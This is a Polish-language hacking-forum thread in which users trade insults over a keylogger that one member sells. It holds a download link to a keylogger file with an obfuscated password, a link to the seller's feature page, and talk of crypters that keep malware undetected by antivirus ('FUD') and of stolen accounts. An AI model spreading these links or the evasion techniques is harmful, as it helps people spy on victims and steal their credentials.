Poszukuje Good keylogger.

meViu

Użytkownik
Dołączył
Kwiecień 8, 2013
Posty
223

Do4Got

Użytkownik
Dołączył
Listopad 18, 2012
Posty
242
Meviu ogarnij sie z tym twoim chłamem nikt ci tego nie kupi wszystko jest w sieci darmowe :)
Kto ci kupi plik infekujacy bez Generatora
Nie rób z siebie Debila , jak ci hajsu trzeba idz na truskawki dymac w polu płacą 100zł dniówka
Te wasze keyloggery się nadają mozna nimi o kant hu.. trzepnąć, mozna to ogarnąć w secundy olddebugger /Wireshark
Na co komu keyloggery co z nich masz?? radoche dojścia logów na dwa dni?? żenada?
Jaki fud oferujesz? 3dniowy?
Jak wysyłane logii post,ftp email?
Zrób może sobie strone jeszcze i oszukuj ludzi??
Stary zainwestuj w cos mocniejszego?
W jakim języku napisane?
Jakie wymagania, Biblioteki?
Może jakis screen twoiego autorstwa Generatora nie sam stub??
Pogadaj z nickiem spammer1987 pomoże,kilka osób wie o co chodzi:cool:
To ty się ogarnij :)
Wszystko jest napisane w temacie jego keyloggera.
Zarejestrowałeś sie wczoraj i myślisz że wiesz wszystko o forum i userach ( ;) )
Po 1. Znajdź w sieci darmowego keyloggera wykrywalnego przez max 1/35 antywirusów.
Po 2. Jeżeli nie ma generatora to nie ma też stuba. Jest skompilowany plik.
Po 3. Pie*dol sie :)
 
Ostatnia edycja:

Αvenger

Były Moderator
Dołączył
Grudzień 21, 2012
Posty
243
Do całej ekipy. Nie banujcie tego gościa!
Zbliża się weekend, konkretna dawka śmiechu gwarantowana. :)
 

Do4Got

Użytkownik
Dołączył
Listopad 18, 2012
Posty
242
To ty się ogarnij :)
Wszystko jest napisane w temacie jego keyloggera.
Zarejestrowałeś sie wczoraj i myślisz że wiesz wszystko o forum i userach ( ;) )
Po 1. Znajdź w sieci darmowego keyloggera wykrywalnego przez max 1/35 antywirusów.
Po 2. Jeżeli nie ma generatora to nie ma też stuba. Jest skompilowany plik.
Po 3. Pie*dol sie :)[/QUOT

1. NIE MAM POTRZEBY;)
2.Sam się nie stworzy z powietrza
3.Tak odplamiaj kolegów i kradnij dalej konta ludziom do4Got pało wiejska :p
1. Skoro tak to nie mów ze są - nie masz dowodów :)
2. Stub to plik do którego sie "wkłada" dane z generatora. Jeśli nie ma potrzeby ładowania do czegoś danych to nie ma stuba. Plik jest wynikiem.
3. Nie kradnę kont - po co?
 

Do4Got

Użytkownik
Dołączył
Listopad 18, 2012
Posty
242
Proponuje ci to ścierwo.
Cicha Praca.
Stub 17KB
English:D
W razie problemów z hasłem pisz na pw.
Chyba że udzielona zostanie ci pomoc Programistów .;)

Dl. http://www.sendspace.pl/file/b1409e25ea142e2fafca3b4/hf-keylogger-steryd

Pass: Enigma/key=Spammer1987/AhfX/,Char to String /Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(121) & Chr(100)/,RxBot F1/ {21,28,-54,20,0}; >>>>>>>>>>>> Jedziemy w tą manie.

Pomimo dużego prostactwa na forum ,osoby której nie lubie licze na jednego użytkownika który szybko sobie z tym poradzi, Czytelnik powodzenia.

Do4Got



1.Mam dostęp do Crypterów z fud 1/46 dzień w dzień ,ale nie widze powodu jakim miałbym ci go ujawniaćB)
Ja mam dostęp do crypterów 0/46 dzień w dzień :)
Nie szukam darmowych tak jak ty z powodu braku kasy :)
 

meViu

Użytkownik
Dołączył
Kwiecień 8, 2013
Posty
223
Meviu ogarnij sie z tym twoim chłamem nikt ci tego nie kupi wszystko jest w sieci darmowe :)
Nie narzekam na brak klientów, wręcz przeciwnie. Skoro według Ciebie to chłam to napisz coś lepszego - jeśli potrafisz w co wątpię.

Kto ci kupi plik infekujacy bez Generatora
Tak jak wspomniałem nie narzekam na brak klientów i jakoś kupują plik infekujący !

Nie rób z siebie Debila , jak ci hajsu trzeba idz na truskawki dymac w polu płacą 100zł dniówka
Jedyną osobą robiącą z siebie debila na tym forum jesteś Ty jeśli nadal tego nie zauważyłeś. Gdybyś chciał wiedzieć moja dniówka wynosi ~500 zł.

Te wasze keyloggery się nadają mozna nimi o kant hu.. trzepnąć, mozna to ogarnąć w secundy olddebugger /Wireshark
Skoro taki mądry to napisz własnego, a nie narzekasz ! Nikt Ci nie każe ich używać.

Na co komu keyloggery co z nich masz?? radoche dojścia logów na dwa dni?? żenada?
A jakoś komuś się jednak przydaje. Żenadą nazwałbym Twój poziom intelektualny.

Jaki fud oferujesz? 3dniowy?
Polecam zacząć jakiekolwiek kształcenie od nauki czytania ze zrozumieniem.

Jak wysyłane logii post,ftp email?
Zrób może sobie strone jeszcze i oszukuj ludzi??
Stary zainwestuj w cos mocniejszego?
W jakim języku napisane?
Jakie wymagania, Biblioteki?
Tutaj znajdziesz odpowiedź: http://hermes-keylogger.p.ht/functions.html

Może jakis screen twoiego autorstwa Generatora nie sam stub??
Jaki stub ? :O A po jakiego c***a mi generator ?
 

meViu

Użytkownik
Dołączył
Kwiecień 8, 2013
Posty
223
Prawda cię widze zabolała za bardzo ,skoro nie umiesz zarobić w życiu ralnym to próbujesz na wyzysku niedoświadczonych ludzi:)

Napisał to człowiek (jeśli tak można Cię nazwać), który jest uważany za największego idiotę na forum :)

Człowieku Ty w życiu nie osiągniesz tego co ja w realnym życiu :) po prostu twój debilizm blokuje Ci jakiekolwiek horyzonty :) Nie potrafisz nic oprócz robienia z siebie pośmiewiska. Próbujesz się odgrywać i wypisujesz na różnych forach że jestem oszustem i co daje Ci satysfakcję ? Nikogo nie oszukuje, sprzedaje keylogger'a hobbystycznie (nie udostępniam za free bo nie chce żeby wykrywalność była na poziomie 44/45 a zawsze coś grosza wpadnie) - nie muszę tego robić bo mam bardzo dobrze płatną pracę :) A przypominam Ci, że to Ty pod innymi nickami naciągałeś ludzi.
 
Do góry Bottom